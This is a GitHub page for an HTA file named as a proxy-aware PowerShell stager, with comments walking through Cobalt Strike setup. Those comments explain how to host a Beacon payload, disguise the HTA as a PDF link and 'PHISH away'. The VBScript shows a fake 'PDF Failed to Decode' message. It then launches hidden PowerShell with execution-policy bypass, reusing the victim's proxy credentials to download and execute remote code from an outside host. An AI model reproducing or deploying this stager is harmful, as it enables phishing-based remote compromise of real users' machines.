-
Notifications
You must be signed in to change notification settings - Fork 126
Expand file tree
/
Copy pathProxyAware-ps-Stager.hta
More file actions
27 lines (22 loc) · 1.28 KB
/
ProxyAware-ps-Stager.hta
File metadata and controls
27 lines (22 loc) · 1.28 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# CobaltStrike setup
# 1) git clone
# 2) remove the comment block “#"
# 3) Client name has to be set in the message box function
# 4) setup listener of choice -> generate payload -> fully stagged (s) -> powershell -> name “client_pto.txt” -> save to desktop
# 5) CS -> host-file -> http://s.com/download/client_pto.txt
# 6) open HTA go to line 5 and replace $wc.downloadstring('http://s.org/beacon') with -> http://s.com/download/client_pto.txt
# 7) CS -> host file -> select HTA on desktop -> HOST AS “ http://s.com/download/client_pto.pdf"
# 8) simplyTemplate -> PTO template -> use the PDF link in the template %URL% location -> and PHISH away
<script language="VBScript">
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell.exe -exec bypass -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX ($wc.downloadstring('http://site.org/beacon'))", 0, true
End Function
Function TestBox()
Msgbox "Client name (PDF Failed to Decode!)"
End Function
TestBox
var_func
self.close
</script>